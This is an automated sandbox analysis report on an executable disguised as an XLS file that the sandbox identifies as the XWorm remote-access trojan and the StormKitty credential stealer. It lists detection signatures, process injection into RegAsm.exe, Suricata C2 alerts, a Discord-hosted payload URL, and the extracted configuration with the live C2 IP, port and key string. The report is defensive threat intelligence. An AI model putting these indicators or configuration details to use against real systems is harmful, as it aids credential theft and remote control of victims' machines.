Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
rDoc5633276235623657_xls.exe

Overview

General Information

Sample name:rDoc5633276235623657_xls.exe
Analysis ID:1519397
MD5:d5489da5aa14ed9d71d8338ec41a1bc1
SHA1:fe04a678f7d95ed31bd364e0a8a4831964f2b84f
SHA256:96dea95151b45309d8bda1112f842802e852a15ac2173b0023b1ba35deae5ec1
Tags:exeuser-Porcupine
Infos:

Detection

StormKitty, XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected BrowserPasswordDump
Yara detected StormKitty Stealer
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Writes to foreign memory regions
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Stores large binary data to the registry
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • rDoc5633276235623657_xls.exe (PID: 6696 cmdline: "C:\Users\user\Desktop\rDoc5633276235623657_xls.exe" MD5: D5489DA5AA14ED9D71D8338EC41A1BC1)
    • RegAsm.exe (PID: 6980 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • RegAsm.exe (PID: 7008 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • WerFault.exe (PID: 5936 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7008 -s 2044 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Cameleon, StormKittyPWC describes this malware as a backdoor, capable of file management, upload and download of files, and execution of commands.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cameleon
NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["178.215.236.218"], "Port": "16433", "Aes key": "<Xwormmm>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.2652861730.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
    00000002.00000002.2652861730.0000000000402000.00000040.00000400.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
    • 0x721e:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0x72bb:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0x73d0:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0x7090:$cnc4: POST / HTTP/1.1
    00000000.00000002.1784666277.0000000002DB4000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
      00000000.00000002.1784666277.0000000002DB4000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0x15e3a:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x1e87a:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x272d2:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x30bce:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x15ed7:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x1e917:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x2736f:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x30c6b:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x15fec:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x1ea2c:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x27484:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x30d80:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x15cac:$cnc4: POST / HTTP/1.1
      • 0x1e6ec:$cnc4: POST / HTTP/1.1
      • 0x27144:$cnc4: POST / HTTP/1.1
      • 0x30a40:$cnc4: POST / HTTP/1.1
      00000002.00000002.2660991014.0000000006AD0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_StormKittyYara detected StormKitty StealerJoe Security
        Click to see the 12 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        0.2.rDoc5633276235623657_xls.exe.2dd3eb4.1.unpackJoeSecurity_XWormYara detected XWormJoe Security
          0.2.rDoc5633276235623657_xls.exe.2dd3eb4.1.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
          • 0x561e:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
          • 0x56bb:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
          • 0x57d0:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
          • 0x5490:$cnc4: POST / HTTP/1.1
          2.2.RegAsm.exe.400000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
            2.2.RegAsm.exe.400000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
            • 0x741e:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
            • 0x74bb:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
            • 0x75d0:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
            • 0x7290:$cnc4: POST / HTTP/1.1
            0.2.rDoc5633276235623657_xls.exe.2dcb45c.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
              Click to see the 17 entries

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Startup Folder File Write
              Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ProcessId: 7008, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-09-26T13:26:26.063538+020028528701Malware Command and Control Activity Detected178.215.236.21816433192.168.2.449731TCP
              2024-09-26T13:26:36.919201+020028528701Malware Command and Control Activity Detected178.215.236.21816433192.168.2.449731TCP
              2024-09-26T13:26:42.669326+020028528701Malware Command and Control Activity Detected178.215.236.21816433192.168.2.449731TCP
              2024-09-26T13:26:47.301601+020028528701Malware Command and Control Activity Detected178.215.236.21816433192.168.2.449731TCP
              2024-09-26T13:26:57.820236+020028528701Malware Command and Control Activity Detected178.215.236.21816433192.168.2.449731TCP
              2024-09-26T13:27:08.430346+020028528701Malware Command and Control Activity Detected178.215.236.21816433192.168.2.449731TCP
              2024-09-26T13:27:12.607434+020028528701Malware Command and Control Activity Detected178.215.236.21816433192.168.2.449731TCP
              2024-09-26T13:27:19.155830+020028528701Malware Command and Control Activity Detected178.215.236.21816433192.168.2.449731TCP
              2024-09-26T13:27:23.086278+020028528701Malware Command and Control Activity Detected178.215.236.21816433192.168.2.449731TCP
              2024-09-26T13:27:23.398379+020028528701Malware Command and Control Activity Detected178.215.236.21816433192.168.2.449731TCP
              2024-09-26T13:27:23.853689+020028528701Malware Command and Control Activity Detected178.215.236.21816433192.168.2.449731TCP
              2024-09-26T13:27:23.952814+020028528701Malware Command and Control Activity Detected178.215.236.21816433192.168.2.449731TCP
              2024-09-26T13:27:24.050877+020028528701Malware Command and Control Activity Detected178.215.236.21816433192.168.2.449731TCP
              2024-09-26T13:27:34.538831+020028528701Malware Command and Control Activity Detected178.215.236.21816433192.168.2.449731TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-09-26T13:26:26.102394+020028529231Malware Command and Control Activity Detected192.168.2.449731178.215.236.21816433TCP
              2024-09-26T13:26:27.711240+020028529231Malware Command and Control Activity Detected192.168.2.449737178.215.236.21816433TCP
              2024-09-26T13:26:27.904405+020028529231Malware Command and Control Activity Detected192.168.2.449737178.215.236.21816433TCP
              2024-09-26T13:26:27.932266+020028529231Malware Command and Control Activity Detected192.168.2.449737178.215.236.21816433TCP
              2024-09-26T13:26:28.041739+020028529231Malware Command and Control Activity Detected192.168.2.449737178.215.236.21816433TCP
              2024-09-26T13:26:28.151091+020028529231Malware Command and Control Activity Detected192.168.2.449737178.215.236.21816433TCP
              2024-09-26T13:26:28.260478+020028529231Malware Command and Control Activity Detected192.168.2.449737178.215.236.21816433TCP
              2024-09-26T13:26:28.382753+020028529231Malware Command and Control Activity Detected192.168.2.449737178.215.236.21816433TCP
              2024-09-26T13:26:28.495593+020028529231Malware Command and Control Activity Detected192.168.2.449737178.215.236.21816433TCP
              2024-09-26T13:26:28.605361+020028529231Malware Command and Control Activity Detected192.168.2.449737178.215.236.21816433TCP
              2024-09-26T13:26:28.730651+020028529231Malware Command and Control Activity Detected192.168.2.449737178.215.236.21816433TCP
              2024-09-26T13:26:36.921165+020028529231Malware Command and Control Activity Detected192.168.2.449731178.215.236.21816433TCP
              2024-09-26T13:26:47.304152+020028529231Malware Command and Control Activity Detected192.168.2.449731178.215.236.21816433TCP
              2024-09-26T13:26:57.825196+020028529231Malware Command and Control Activity Detected192.168.2.449731178.215.236.21816433TCP
              2024-09-26T13:27:08.437665+020028529231Malware Command and Control Activity Detected192.168.2.449731178.215.236.21816433TCP
              2024-09-26T13:27:19.157555+020028529231Malware Command and Control Activity Detected192.168.2.449731178.215.236.21816433TCP
              2024-09-26T13:27:23.088880+020028529231Malware Command and Control Activity Detected192.168.2.449731178.215.236.21816433TCP
              2024-09-26T13:27:23.400282+020028529231Malware Command and Control Activity Detected192.168.2.449731178.215.236.21816433TCP
              2024-09-26T13:27:23.856833+020028529231Malware Command and Control Activity Detected192.168.2.449731178.215.236.21816433TCP
              2024-09-26T13:27:23.955308+020028529231Malware Command and Control Activity Detected192.168.2.449731178.215.236.21816433TCP
              2024-09-26T13:27:24.053253+020028529231Malware Command and Control Activity Detected192.168.2.449731178.215.236.21816433TCP
              2024-09-26T13:27:34.540801+020028529231Malware Command and Control Activity Detected192.168.2.449731178.215.236.21816433TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-09-26T13:26:42.669326+020028528741Malware Command and Control Activity Detected178.215.236.21816433192.168.2.449731TCP
              2024-09-26T13:27:12.607434+020028528741Malware Command and Control Activity Detected178.215.236.21816433192.168.2.449731TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-09-26T13:26:27.711240+020028528731Malware Command and Control Activity Detected192.168.2.449737178.215.236.21816433TCP
              2024-09-26T13:26:27.904405+020028528731Malware Command and Control Activity Detected192.168.2.449737178.215.236.21816433TCP
              2024-09-26T13:26:27.932266+020028528731Malware Command and Control Activity Detected192.168.2.449737178.215.236.21816433TCP
              2024-09-26T13:26:28.041739+020028528731Malware Command and Control Activity Detected192.168.2.449737178.215.236.21816433TCP
              2024-09-26T13:26:28.151091+020028528731Malware Command and Control Activity Detected192.168.2.449737178.215.236.21816433TCP
              2024-09-26T13:26:28.260478+020028528731Malware Command and Control Activity Detected192.168.2.449737178.215.236.21816433TCP
              2024-09-26T13:26:28.382753+020028528731Malware Command and Control Activity Detected192.168.2.449737178.215.236.21816433TCP
              2024-09-26T13:26:28.495593+020028528731Malware Command and Control Activity Detected192.168.2.449737178.215.236.21816433TCP
              2024-09-26T13:26:28.605361+020028528731Malware Command and Control Activity Detected192.168.2.449737178.215.236.21816433TCP
              2024-09-26T13:26:28.730651+020028528731Malware Command and Control Activity Detected192.168.2.449737178.215.236.21816433TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-09-26T13:26:25.809760+020028559241Malware Command and Control Activity Detected192.168.2.449731178.215.236.21816433TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-09-26T13:26:26.208741+020028531921Malware Command and Control Activity Detected192.168.2.449731178.215.236.21816433TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: rDoc5633276235623657_xls.exeAvira: detected
              Found malware configuration
              Source: 00000000.00000002.1784666277.0000000002DB4000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["178.215.236.218"], "Port": "16433", "Aes key": "<Xwormmm>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Machine Learning detection for sample
              Source: rDoc5633276235623657_xls.exeJoe Sandbox ML: detected
              Sample uses string decryption to hide its real strings
              Source: 0.2.rDoc5633276235623657_xls.exe.2dcb45c.0.raw.unpackString decryptor: 178.215.236.218
              Source: 0.2.rDoc5633276235623657_xls.exe.2dcb45c.0.raw.unpackString decryptor: 16433
              Source: 0.2.rDoc5633276235623657_xls.exe.2dcb45c.0.raw.unpackString decryptor: <123456789>
              Source: 0.2.rDoc5633276235623657_xls.exe.2dcb45c.0.raw.unpackString decryptor: <Xwormmm>
              Source: 0.2.rDoc5633276235623657_xls.exe.2dcb45c.0.raw.unpackString decryptor: XWorm V5.6
              Source: 0.2.rDoc5633276235623657_xls.exe.2dcb45c.0.raw.unpackString decryptor: USB.exe
              Source: 0.2.rDoc5633276235623657_xls.exe.2dcb45c.0.raw.unpackString decryptor: %AppData%
              Source: 0.2.rDoc5633276235623657_xls.exe.2dcb45c.0.raw.unpackString decryptor: XClient.exe
              Source: rDoc5633276235623657_xls.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.4:49730 version: TLS 1.2
              Source: rDoc5633276235623657_xls.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: C:\Windows\mscorlib.pdb source: RegAsm.exe, 00000002.00000002.2659153420.0000000005A5A000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: RegAsm.exe, 00000002.00000002.2653222752.0000000001215000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Data.pdb source: WER8A2C.tmp.dmp.9.dr
              Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: RegAsm.exe, 00000002.00000002.2659308931.0000000005BD6000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\symbols\exe\RegAsm.pdb source: RegAsm.exe, 00000002.00000002.2659308931.0000000005BD6000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbeTOT source: RegAsm.exe, 00000002.00000002.2659308931.0000000005BC0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: RegAsm.pdb source: RegAsm.exe, 00000002.00000002.2659308931.0000000005BD6000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2659308931.0000000005BB0000.00000004.00000020.00020000.00000000.sdmp, XClient.exe.2.dr
              Source: Binary string: mscorlib.pdbq source: RegAsm.exe, 00000002.00000002.2659153420.0000000005A5A000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: System.Xml.ni.pdbRSDS# source: WER8A2C.tmp.dmp.9.dr
              Source: Binary string: Microsoft.VisualBasic.pdb source: WER8A2C.tmp.dmp.9.dr
              Source: Binary string: System.Core.ni.pdb source: WER8A2C.tmp.dmp.9.dr
              Source: Binary string: System.Numerics.ni.pdb source: WER8A2C.tmp.dmp.9.dr
              Source: Binary string: HSDSDF32.pdbh source: rDoc5633276235623657_xls.exe
              Source: Binary string: System.Transactions.ni.pdbRSDSc source: WER8A2C.tmp.dmp.9.dr
              Source: Binary string: \??\C:\Windows\symbols\exe\RegAsm.pdbH source: RegAsm.exe, 00000002.00000002.2659308931.0000000005BD6000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER8A2C.tmp.dmp.9.dr
              Source: Binary string: mscorlib.ni.pdb source: WER8A2C.tmp.dmp.9.dr
              Source: Binary string: \??\C:\Windows\mscorlib.pdb source: RegAsm.exe, 00000002.00000002.2659308931.0000000005BD6000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: RegAsm.pdb4 source: RegAsm.exe, 00000002.00000002.2659308931.0000000005BB0000.00000004.00000020.00020000.00000000.sdmp, XClient.exe.2.dr
              Source: Binary string: \??\C:\Windows\RegAsm.pdbp( source: RegAsm.exe, 00000002.00000002.2659308931.0000000005BD6000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Configuration.pdb8< source: WER8A2C.tmp.dmp.9.dr
              Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER8A2C.tmp.dmp.9.dr
              Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: RegAsm.exe, 00000002.00000002.2659153420.0000000005A5A000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: System.Runtime.Serialization.ni.pdb source: WER8A2C.tmp.dmp.9.dr
              Source: Binary string: \??\C:\Windows\RegAsm.pdb0(G source: RegAsm.exe, 00000002.00000002.2659308931.0000000005BD6000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Xml.ni.pdb source: WER8A2C.tmp.dmp.9.dr
              Source: Binary string: System.Runtime.Serialization.ni.pdbRSDSg@h source: WER8A2C.tmp.dmp.9.dr
              Source: Binary string: mscorlib.pdbL} source: RegAsm.exe, 00000002.00000002.2659308931.0000000005BD6000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: oC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: RegAsm.exe, 00000002.00000002.2659153420.0000000005A5A000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: System.ni.pdbRSDS source: WER8A2C.tmp.dmp.9.dr
              Source: Binary string: mscorlib.pdb< source: WER8A2C.tmp.dmp.9.dr
              Source: Binary string: Microsoft.VisualBasic.pdbRSDSc source: WER8A2C.tmp.dmp.9.dr
              Source: Binary string: HSDSDF32.pdb source: rDoc5633276235623657_xls.exe
              Source: Binary string: C:\Windows\RegAsm.pdbpdbAsm.pdb source: RegAsm.exe, 00000002.00000002.2653222752.0000000001215000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: n0C:\Windows\mscorlib.pdb source: RegAsm.exe, 00000002.00000002.2659153420.0000000005A5A000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: System.Configuration.ni.pdb source: WER8A2C.tmp.dmp.9.dr
              Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.pdb source: RegAsm.exe, 00000002.00000002.2659308931.0000000005BC0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: RegAsm.exe, 00000002.00000002.2659308931.0000000005BC0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: mscorlib.ni.pdbRSDS source: WER8A2C.tmp.dmp.9.dr
              Source: Binary string: \??\C:\Windows\exe\RegAsm.pdba source: RegAsm.exe, 00000002.00000002.2659308931.0000000005BD6000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Data.ni.pdb source: WER8A2C.tmp.dmp.9.dr
              Source: Binary string: System.Configuration.pdb source: WER8A2C.tmp.dmp.9.dr
              Source: Binary string: System.Xml.pdb source: WER8A2C.tmp.dmp.9.dr
              Source: Binary string: o.pdb source: RegAsm.exe, 00000002.00000002.2659153420.0000000005A5A000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: System.pdb source: WER8A2C.tmp.dmp.9.dr
              Source: Binary string: System.Numerics.ni.pdbRSDSautg source: WER8A2C.tmp.dmp.9.dr
              Source: Binary string: %%.pdb source: RegAsm.exe, 00000002.00000002.2659153420.0000000005A5A000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: System.Windows.Forms.pdb source: WER8A2C.tmp.dmp.9.dr
              Source: Binary string: mscorlib.pdb source: RegAsm.exe, 00000002.00000002.2659308931.0000000005BB0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2659153420.0000000005A5A000.00000004.00000010.00020000.00000000.sdmp, WER8A2C.tmp.dmp.9.dr
              Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: RegAsm.exe, 00000002.00000002.2659308931.0000000005BD6000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.pdbhk@ source: WER8A2C.tmp.dmp.9.dr
              Source: Binary string: System.Drawing.pdb source: WER8A2C.tmp.dmp.9.dr
              Source: Binary string: System.Management.pdb source: WER8A2C.tmp.dmp.9.dr
              Source: Binary string: System.Xml.pdb@DHLPhl source: WER8A2C.tmp.dmp.9.dr
              Source: Binary string: System.Data.ni.pdbRSDS source: WER8A2C.tmp.dmp.9.dr
              Source: Binary string: System.Management.ni.pdb source: WER8A2C.tmp.dmp.9.dr
              Source: Binary string: System.Core.pdb source: WER8A2C.tmp.dmp.9.dr
              Source: Binary string: System.Transactions.pdb source: WER8A2C.tmp.dmp.9.dr
              Source: Binary string: \??\C:\Windows\exe\RegAsm.pdbE source: RegAsm.exe, 00000002.00000002.2659308931.0000000005BD6000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: symbols\dll\mscorlib.pdbLb source: RegAsm.exe, 00000002.00000002.2659153420.0000000005A5A000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: System.Runtime.Serialization.pdb source: WER8A2C.tmp.dmp.9.dr
              Source: Binary string: System.Core.pdbxm. source: WER8A2C.tmp.dmp.9.dr
              Source: Binary string: System.Transactions.ni.pdb source: WER8A2C.tmp.dmp.9.dr
              Source: Binary string: mscorlib.pdb246122658-3693405117-2476756634-1002_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\Servererver32 source: RegAsm.exe, 00000002.00000002.2653222752.0000000001215000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Numerics.pdb source: WER8A2C.tmp.dmp.9.dr
              Source: Binary string: System.Windows.Forms.pdbDN. source: WER8A2C.tmp.dmp.9.dr
              Source: Binary string: System.ni.pdb source: WER8A2C.tmp.dmp.9.dr
              Source: Binary string: System.Data.pdb, source: WER8A2C.tmp.dmp.9.dr
              Source: Binary string: System.Core.ni.pdbRSDS source: WER8A2C.tmp.dmp.9.dr
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then inc dword ptr [ebp-30h]2_2_06660F28

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:49731 -> 178.215.236.218:16433
              Source: Network trafficSuricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 178.215.236.218:16433 -> 192.168.2.4:49731
              Source: Network trafficSuricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.4:49731 -> 178.215.236.218:16433
              Source: Network trafficSuricata IDS: 2852873 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 : 192.168.2.4:49737 -> 178.215.236.218:16433
              Source: Network trafficSuricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.4:49737 -> 178.215.236.218:16433
              Source: Network trafficSuricata IDS: 2853192 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - sendPlugin Outbound : 192.168.2.4:49731 -> 178.215.236.218:16433
              Source: Network trafficSuricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 178.215.236.218:16433 -> 192.168.2.4:49731
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: 178.215.236.218
              Yara detected Generic Downloader
              Source: Yara matchFile source: Process Memory Space: rDoc5633276235623657_xls.exe PID: 6696, type: MEMORYSTR
              Source: global trafficTCP traffic: 192.168.2.4:49731 -> 178.215.236.218:16433
              Source: global trafficHTTP traffic detected: GET /attachments/1288648799220400244/1288791621017669705/xxxxxxxxxxx.txt?ex=66f6783b&is=66f526bb&hm=22a3bafe0f63ec86e36ba63ace27289331a1b6e8c8a217e16ac633d8848215f6& HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
              Source: Joe Sandbox ViewIP Address: 162.159.135.233 162.159.135.233
              Source: Joe Sandbox ViewIP Address: 162.159.135.233 162.159.135.233
              Source: Joe Sandbox ViewASN Name: LVLT-10753US LVLT-10753US
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: unknownTCP traffic detected without corresponding DNS query: 178.215.236.218
              Source: unknownTCP traffic detected without corresponding DNS query: 178.215.236.218
              Source: unknownTCP traffic detected without corresponding DNS query: 178.215.236.218
              Source: unknownTCP traffic detected without corresponding DNS query: 178.215.236.218
              Source: unknownTCP traffic detected without corresponding DNS query: 178.215.236.218
              Source: unknownTCP traffic detected without corresponding DNS query: 178.215.236.218
              Source: unknownTCP traffic detected without corresponding DNS query: 178.215.236.218
              Source: unknownTCP traffic detected without corresponding DNS query: 178.215.236.218
              Source: unknownTCP traffic detected without corresponding DNS query: 178.215.236.218
              Source: unknownTCP traffic detected without corresponding DNS query: 178.215.236.218
              Source: unknownTCP traffic detected without corresponding DNS query: 178.215.236.218
              Source: unknownTCP traffic detected without corresponding DNS query: 178.215.236.218
